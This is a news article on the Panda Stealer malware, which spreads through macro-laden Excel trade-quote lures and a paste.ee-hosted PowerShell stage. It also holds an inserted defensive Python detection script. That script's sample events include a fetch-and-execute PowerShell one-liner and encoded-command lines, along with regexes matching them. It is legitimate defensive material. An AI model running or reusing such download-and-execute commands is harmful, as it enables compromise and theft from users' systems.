New Panda Stealer malware goes after cryptocurrency wallets
By Bob Garcia
Beware of trade quotes masquerading as Excel files
Threats in the cryptocurrency world have not stopped, and several wallets could be at risk if action is not taken as soon as possible. According to several researchers, a new variant of cryptocurrency-stealing malware has come to light. It uses a fileless approach in its global spam distribution campaign in order to avoid detection while carrying out whatever it intends, including the theft of digital assets.
“Panda Stealer” appears to be the nickname of the gang behind this malware. Its modus operandi is based on emails that look like requests for trade quotes, designed to lure recipients into opening malicious Excel files, and that is where all the action kicks off. According to the investigations carried out so far, people in the United States, Australia, Japan and Germany have been targeted by this malware, a modification of Collector Stealer.
Trend Micro researchers have done their homework so far and have identified two infection chains. The first uses an .XLSM attachment containing macros that download a loader, which in turn downloads and executes the main stealer. The second relies on a string inside an .XLS file containing an Excel template; that string reaches out to paste.ee, a Pastebin alternative, which in turn serves a second, encrypted PowerShell command.
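As an added illustration of how a defender might look for the two chains described above (this is example code written for this page, not anything from Trend Micro or the article's author): a small Python script that checks whether an OOXML workbook carries a VBA project, and flags process-creation telemetry in which an Office application spawns a script host, the command line fetches from paste.ee, or PowerShell is started with an encoded command. The event format, the file names and the encoded payload fragment are constructed for the demo; only the paste.ee host comes from the article.

```python
import io
import re
import zipfile
from dataclasses import dataclass

# Constructed sample process-creation events (not real telemetry), in the
# hypothetical shape "parent_image|image|command_line". The paste.ee host is
# named in the article; file names and the encoded fragment are made up.
SAMPLE_EVENTS = [
    "explorer.exe|EXCEL.EXE|EXCEL.EXE C:\\Users\\a\\Downloads\\quote.xlsm",
    "EXCEL.EXE|powershell.exe|powershell -nop -w hidden -enc SQBFAFgA...",
    "EXCEL.EXE|powershell.exe|powershell -c \"iex (iwr https://paste.ee/r/XXXX)\"",
    "explorer.exe|powershell.exe|powershell Get-Process",
    "svchost.exe|powershell.exe|powershell -enc SQBFAFgA",
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}
# Paste-service download used by the second chain.
PASTE_RE = re.compile(r"https?://(?:www\.)?paste\.ee/", re.IGNORECASE)
# PowerShell's -EncodedCommand switch and its accepted abbreviations.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\b", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    reasons: list
    score: int


def analyse_event(line_no, line):
    """Return a Finding for one telemetry line, or None if nothing is suspicious."""
    parent, image, cmdline = (p.strip() for p in line.split("|", 2))
    reasons = []
    if parent.lower() in OFFICE_PARENTS and image.lower() in SCRIPT_HOSTS:
        reasons.append("office-app-spawned-script-host")
    if PASTE_RE.search(cmdline):
        reasons.append("paste-service-download")
    if ENC_RE.search(cmdline):
        reasons.append("encoded-powershell")
    if not reasons:
        return None
    # Score is simply the number of independent indicators that fired;
    # two or more on one event is worth an analyst's attention.
    return Finding(line_no, reasons, len(reasons))


def scan_events(events):
    """Run analyse_event over every line and keep only the hits."""
    findings = []
    for i, line in enumerate(events, 1):
        finding = analyse_event(i, line)
        if finding is not None:
            findings.append(finding)
    return findings


def has_vba_project(workbook_bytes):
    """True when an OOXML workbook (zip container) carries a VBA project,
    i.e. it is macro-enabled like the .XLSM lure in the first chain."""
    try:
        with zipfile.ZipFile(io.BytesIO(workbook_bytes)) as zf:
            return any(n.lower() == "xl/vbaproject.bin" for n in zf.namelist())
    except zipfile.BadZipFile:
        return False


def build_sample_workbook(with_macro):
    """Constructed minimal OOXML-shaped zip for the demo; not a real workbook."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_macro:
            zf.writestr("xl/vbaProject.bin", b"\x00")
    return buf.getvalue()


if __name__ == "__main__":
    print("macro-enabled:", has_vba_project(build_sample_workbook(True)))
    for f in scan_events(SAMPLE_EVENTS):
        print(f"event {f.line_no}: score={f.score} {', '.join(f.reasons)}")
```

In real deployments the three indicators would be separate rules (parent/child relationship, paste-service URL, encoded command) so that each can be tuned on its own; the combined score here just shows why an Office parent plus an encoded or paste-fetching PowerShell child stands out against the benign PowerShell use on line 4.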
Once this process succeeds and installation on the device is complete, Panda Stealer can access and collect private keys and past transaction records from the victim’s digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. “Not only does it target cryptocurrency wallets, but it can steal credentials from other applications, such as NordVPN, Telegram, the Discord chat app, and Steam,” the researchers note. So far, researchers have identified an IP address used by the attackers and are doing their best to stop this attack as soon as possible.